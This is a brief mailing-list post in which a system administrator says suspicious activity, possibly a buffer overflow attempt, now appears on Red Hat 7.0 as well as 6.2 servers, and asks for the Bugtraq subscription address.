Thanks for confirming that I'm not the only one seeing this.
The update is that I'm now seeing this happen on redhat 7.0 boxes
(which have similar roles to our other rh6.x servers), so it is NOT
specific to redhat 6.2.
I really need to get to the bottom of this. I'm still not 100%
convinced that it actually is a buffer overflow attempt, but it's
starting to look that way.
Can someone (privately) send me the listserver subscription address
for bugtraq, (or some similar mailing list that isn't so busy) where
I might find people clued up on all this sort of stuff?
